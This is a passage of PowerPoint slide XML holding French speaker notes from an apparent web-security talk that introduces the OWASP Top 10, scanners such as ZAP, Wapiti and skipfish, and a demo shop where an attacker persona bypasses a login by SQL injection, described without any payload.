              <a:lnSpc>
                <a:spcPct val="165600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="165600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP WebGoat Project :  c’est une application volontairement non sécurisée créée dans le but de comprendre les failles de sécurités.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="165600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Zed Attack Proxy (ZAP) : Logiciel à télécharger et installer qui permet de crawler un site et de détecter les vulnérabilités.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>La première utilisation est de rentrer une URL et le logiciel crawl le site afin de trouver toutes les urls du site. Les urls externes ne sont pas retenues. Une fois les urls collectées, différents scénarios d’attaques sont exécutés.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="165600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Il y a également la possibilité d’enregistrer le trafic en positionnant le ZAP comme proxy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" u="sng">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://blog.codecentric.de/en/2013/10/automated-security-testing-web-applications-using-owasp-zed-attack-proxy/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>Le top 10 de l’OWASP est basé sur 8 jeux de données de 7 entreprises spécialisées dans la sécurité</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>Objectif : sensibiliser les développeurs, concepteurs, architectes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>Après il y a bien plus de 10...</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fr"/>
              <a:t>Existe des outils automatisés qui permettent de detecter des failles sur des sites Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>On leur envoie une URL à attaquer </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Réalisation de tests </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d’intrusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sur le site : crawler les pages du site (test boite noire : sans regarder le code, on devine les fonctionnalités et la cinématique du site)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>But : trouver des vulnérabilités sur un site</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fr"/>
              <a:t>Zap </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>=&gt; logiciel à par entière OWASP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>skipfish : C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>Wapiti : Py</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>=&gt; génère index.html qu’on peut ouvrir via le navigateur</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>RIPS scanner pour PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>Sur notre site :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>=&gt; detection injection ‘ paramètre u de la requête des produits par catégorie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>=&gt; cookie non en lecture seule</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>=&gt; XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" b="1"/>
              <a:t>A n’utiliser que sur vos sites persos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" b="1"/>
              <a:t>Outils d’audit ne font pas tout ! Ils vont permettre de detecter les failles principales du site (inclu celles qui ont été présentées)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" b="1"/>
              <a:t>mais ne remplace pas l’analyse manuelle et Humaine. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" b="1"/>
              <a:t>A faire au plus tot au moment du dev : revue de code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>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7" name="Shape 4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fr" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Un site de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vente de luxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> type le bon coin.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tout au long de la présentation, nous allons nous référer à ce site de vente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>à travers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 2 personas dont nous avons tous déjà entendu parler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> : c’est une cliente lambda de ce site de vente de luxe. Elle a la possibilité de </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-298450" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>consulter le catalogue des produits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-279400" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="72727"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>elle dispose d’un compte qui confère des droits spécifiques lui permettant notamment de proposer ses produits à la vente</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Oscar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> : hacker mal intentionné. Son but ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-298450" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploiter les failles du site pour y voler les informations sensibles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pour rentrer dans le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vif du sujet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, je vous propose de vous rendre sur le site en question.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1 - Voici workflow du site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2 - produits soigneusement selectionnés</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2 - Avatar : internaute qui realise les actions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3 - Vous pouvez voir une page d’authentification basique… Faille, je vous propose d’en exploiter une</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4 - Et voilà comment en 30 secondes et 10 caractères Oscar de s’y connecter sans connaître aucun identifiant.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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fr"/>
              <a:t>Cette démonstation nous permet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" b="1"/>
              <a:t>d’illustrer une première faille de securité </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" b="1" u="sng"/>
              <a:t>majoritairement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" b="1"/>
              <a:t>utilisée sur le web car facile a exploiter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t> : c’est une injection SQL</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100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Etant donné que bcp de sites web utilisent des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BDD relationnelles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> nous allons parler essentiellement d’injections SQL dans le cadre de ce talk (car nous avons bcp d’autres choses à vous présenter. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mais il faut savoir qu’il existe bien d’autres types d’injections sur les</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> langages interprétés</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> : injection Javascript (XSS), HTML, XML, header HTTP, etc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"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r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>____________________________________________________________________</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
